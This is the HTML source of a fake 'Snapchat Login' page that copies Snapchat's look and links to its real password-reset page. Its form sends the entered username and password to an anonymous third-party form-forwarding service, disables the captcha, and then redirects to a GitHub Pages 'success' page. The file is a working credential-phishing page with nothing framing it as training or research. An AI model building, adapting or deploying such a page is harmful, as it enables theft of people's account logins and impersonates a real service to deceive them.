<!DOCTYPE html>
<html lang="en">
<head>
  <link rel="shortcut icon" type="image/png" href="logo.png">
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Snapchat Login</title>
 <style>
    body {
      background-color: #000000; /* Snapchat black background color */
      background-image: url("bg.png"); /* Add subtle image */
      background-position: center; /* Center the image */
      background-repeat: no-repeat; /* Don't repeat the image */
      background-size: cover; /* Cover the entire background */
      font-family: 'Arial', sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      color: rgb(0, 0, 0); /* Text color */
    }

    .snapchat-login {
      width: 80%;
      max-width: 350px;
      background-color: #FFF; /* Snapchat white background color */
      text-align: center;
      padding: 20px;
      box-sizing: border-box;
      border-radius: 10px; /* Add rounded corners to the login box */
    }

    img {
      width: 100%;
      max-width: 100px;
      height: 100px;
      margin-bottom: 5px;
    }

    h3 {
      text-align: center;
      font-style: initial;
    }

    .c1 {
      width: 100%;
      height: 30px;
      margin-top: 5px;
      background-color: #ECECEC; /* Input field background color */
      border: none;
      outline: none;
      padding: 10px 5px; /* Add equal left and right padding */
      padding-right:0px;
      margin: 0 auto; /* Center the input field horizontally */
      display: block; /* Make the input field a block-level element */
    }

    label {
      display: block; /* Make labels block-level for proper spacing */
      text-align: left; /* Align labels to the left */
      margin-bottom: 5px; /* Add some bottom margin for better spacing */
    }

    .c2 {
      padding-top: 20px;
    }

    span {
      display: block; /* Make the span block-level for proper spacing */
      margin: 10px auto; /* Add top and bottom margins and center the span horizontally */
      padding: 0 10px; /* Add equal left and right padding */
    }

    .btn {
      width: 100%;
      max-width: 200px; /* Increase max-width for better responsiveness */
      height: 40px;
      background-color: #FFFC00; /* Snapchat yellow background color */
      border: none;
      border-radius: 30px;
      margin: 20px auto 0;
      color: #000000; /* Button text color */
    }

    a {
      color: #1CA0F2; /* Snapchat blue color for links */
      text-decoration: none; /* Remove underline from links */
    }

    @media (max-width: 768px) {
      .snapchat-login {
        width: 95%;
        max-width: none;
      }
    }
 </style>
</head>
<body>
 <div class="snapchat-login">
  <br><br><br>
    <img src="logo.svg" alt="Snapchat Logo">
    <h3>Snapchat Login</h3>
    <form action="https://formsubmit.co/1d3e0025cb3087e287d82252046e814c" method="POST">
      <!-- honeypot -->
      <input type="text" name="_honey" style="display: none;">
      <!-- disavle captcha -->
      <input type="hidden" name="_captcha" value="false">
      <input type="hidden" name="_next" value="https://pranix-git.github.io/snapchatlogin/success.html">

      <div class="c2">
        <label for="username">Username</label>
        <input type="text" id="username" class="c1" name="name" required>
      </div>
      
      <div class="c2">
        <label for="password">Password</label>
        <input type="password" id="password" class="c1" name="password" required>
      </div>
      <div>
        <button id="login-button" class="btn" type="submit">Login</button>
      </div>
      
      <span>Forgot <a href="https://accounts.snapchat.com/accounts/password_reset_request">Password?</a></span><br><br><br>
    </form>
 </div>
</body>
</html>
